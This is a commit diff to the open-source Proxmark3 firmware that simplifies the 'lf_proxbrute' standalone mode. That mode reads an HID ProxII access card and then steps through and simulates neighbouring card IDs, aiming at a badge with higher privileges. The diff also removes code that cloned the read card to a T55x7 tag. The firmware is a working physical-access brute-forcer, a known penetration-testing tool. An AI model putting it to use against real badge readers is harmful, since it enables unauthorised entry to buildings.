chg 'lf proxebrute standalone' - simplified it. No need for clone, or multiple slots, LED A = read / record, flashing LED A 12 times, failed reader and next click try again, LED C == proxbrute, all leds flash when exiting standalone mode

armsrc/Standalone/lf_proxbrute.c

@@ -18,8 +18,6 @@
 #include "ticks.h"
 #include "lfops.h"
 
-#define OPTS 2
-
 void ModInfo(void) {
     DbpString("  LF HID ProxII bruteforce - aka Proxbrute (Brad Antoniewicz)");
 }
@@ -30,151 +28,92 @@ void RunMod() {
     Dbprintf(">>  LF HID proxII bruteforce a.k.a ProxBrute Started (Brad Antoniewicz) <<");
     FpgaDownloadAndGo(FPGA_BITSTREAM_LF);
 
-    uint32_t high[OPTS], low[OPTS];
+    uint32_t high, low;
-    int selected = 0;
-    int playing = 0;
-    int cardRead = 0;
 
-    // Turn on selected LED
+#define STATE_READ  0
-    LED(selected + 1, 0);
+#define STATE_BRUTE 1
+
+    uint8_t state = STATE_READ;
 
     for (;;) {
+
         WDT_HIT();
 
         // exit from SamyRun,   send a usbcommand.
         if (data_available()) break;
 
-        // Was our button held down or pressed?
+       // Was our button held down or pressed?
-        int button_pressed = BUTTON_HELD(1000);
+        int button_pressed = BUTTON_HELD(280);
-        SpinDelay(300);
+        if ( button_pressed != BUTTON_HOLD )
+            continue;
 
         // Button was held for a second, begin recording
-        if (button_pressed > 0 && cardRead == 0) {
+        if ( state == STATE_READ ) {
-            LEDsoff();
+
-            LED(selected + 1, 0);
+            LEDsoff();
-            LED(LED_D, 0);
+            LED_A_ON();
+            WAIT_BUTTON_RELEASED();
 
-            // record
             DbpString("[=] starting recording");
 
-            // wait for button to be released
-            while (BUTTON_PRESS())
-                WDT_HIT();
 
-            /* need this delay to prevent catching some weird data */
+            // findone, high, low, no ledcontrol (A)
-            SpinDelay(500);
+            CmdHIDdemodFSK(1, &high, &low, 0);
 
-            CmdHIDdemodFSK(1, &high[selected], &low[selected], 0);
+            Dbprintf("[=]   recorded | %x%08x", high, low);
-            Dbprintf("[=] recorded %x %x %08x", selected, high[selected], low[selected]);
 
-            LEDsoff();
+            // got nothing. blink and loop.
-            LED(selected + 1, 0);
+            if ( high == 0 && low == 0 ) {
-            // Finished recording
+                SpinErr( LED_A, 100, 12);
-            // If we were previously playing, set playing off
+                DbpString("[=] only got zeros, retry recording after click");
-            // so next button push begins playing what we recorded
+                continue;
-            playing = 0;
-            cardRead = 1;
-        } else if (button_pressed > 0 && cardRead == 1) {
-            LEDsoff();
-            LED(selected + 1, 0);
-            LED(LED_A, 0);
-
-            // record
-            Dbprintf("[=] cloning %x %x %08x", selected, high[selected], low[selected]);
-
-            // wait for button to be released
-            while (BUTTON_PRESS())
-                WDT_HIT();
-
-            /* need this delay to prevent catching some weird data */
-            SpinDelay(500);
-
-            CopyHIDtoT55x7(0, high[selected], low[selected], 0);
-            Dbprintf("[=] cloned %x %x %08x", selected, high[selected], low[selected]);
-
-            LEDsoff();
-            LED(selected + 1, 0);
-            // Finished recording
-
-            // If we were previously playing, set playing off
-            // so next button push begins playing what we recorded
-            playing = 0;
-            cardRead = 0;
-        }
-
-        // Change where to record (or begin playing)
-        else if (button_pressed) {
-            // Next option if we were previously playing
-            if (playing)
-                selected = (selected + 1) % OPTS;
-            playing = !playing;
-
-            LEDsoff();
-            LED(selected + 1, 0);
-
-            // Begin transmitting
-            if (playing) {
-                LED(LED_B, 0);
-                DbpString("[=] playing");
-                // wait for button to be released
-                while (BUTTON_PRESS())
-                    WDT_HIT();
-
-                /* START PROXBRUTE */
-
-                /*
-                ProxBrute - brad a. - foundstone
-
-                Following code is a trivial brute forcer once you read a valid tag
-                the idea is you get a valid tag, then just try and brute force to
-                another priv level. The problem is that it has no idea if the code
-                worked or not, so its a crap shoot. One option is to time how long
-                it takes to get a valid ID then start from scratch every time.
-                */
-                if (selected == 1) {
-                    DbpString("[=] entering ProxBrute Mode");
-                    Dbprintf("[=] current Tag: Selected = %x Facility = %08x ID = %08x", selected, high[selected], low[selected]);
-                    LED(LED_A, 0);
-                    LED(LED_C, 0);
-                    for (uint16_t i = low[selected] - 1; i > 0; i--) {
-                        if (BUTTON_PRESS()) {
-                            DbpString("[-] told to stop");
-                            break;
-                        }
-
-                        Dbprintf("[=] trying Facility = %08x ID %08x", high[selected], i);
-                        CmdHIDsimTAGEx(high[selected], i, 0, 20000);
-                        SpinDelay(500);
-                    }
-
-                } else {
-                    DbpString("[=] RED is lit, not entering ProxBrute Mode");
-                    Dbprintf("[=] %x %x %x", selected, high[selected], low[selected]);
-                    CmdHIDsimTAGEx(high[selected], low[selected], 0, 20000);
-                    DbpString("[=] done playing");
-                }
-
-                /*   END PROXBRUTE */
-
-
-                if (BUTTON_HELD(1000) > 0)
-                    goto out;
-
-                /* We pressed a button so ignore it here with a delay */
-                SpinDelay(300);
-
-                // when done, we're done playing, move to next option
-                selected = (selected + 1) % OPTS;
-                playing = !playing;
-                LEDsoff();
-                LED(selected + 1, 0);
-            } else {
-                while (BUTTON_PRESS())
-                    WDT_HIT();
             }
+
+            SpinErr(LED_A, 250, 2);
+            state = STATE_BRUTE;
+            continue;
+
+        } else if ( state == STATE_BRUTE ) {
+
+            LED_C_ON();   // Simulate
+            WAIT_BUTTON_RELEASED();
+
+
+            /*
+              ProxBrute - brad a. - foundstone
+
+              Following code is a trivial brute forcer once you read a valid tag
+              the idea is you get a valid tag, then just try and brute force to
+              another priv level. The problem is that it has no idea if the code
+              worked or not, so its a crap shoot. One option is to time how long
+              it takes to get a valid ID then start from scratch every time.
+            */
+            DbpString("[=] entering ProxBrute mode");
+            Dbprintf("[=] simulating | %08x%08x", high, low);
+
+            for (uint16_t i = low - 1; i > 0; i--) {
+
+                if (data_available()) break;
+
+                // Was our button held down or pressed?
+                int button_pressed = BUTTON_HELD(280);
+                if ( button_pressed != BUTTON_HOLD ) break;
+
+                Dbprintf("[=] trying Facility = %08x ID %08x", high, i);
+
+                // high, i, ledcontrol,  timelimit 20000
+                CmdHIDsimTAGEx(high, i, false, 20000);
+
+                SpinDelay(100);
+            }
+
+           state = STATE_READ;
+           SpinErr( (LED_A | LED_C ), 250, 2);
+           LEDsoff();
         }
     }
-out:
+
-    DbpString("[=] exiting");
+    SpinErr( (LED_A | LED_B | LED_C | LED_D), 250, 5);
+    DbpString("[=] You can take the shell back :) ...");
     LEDsoff();
 }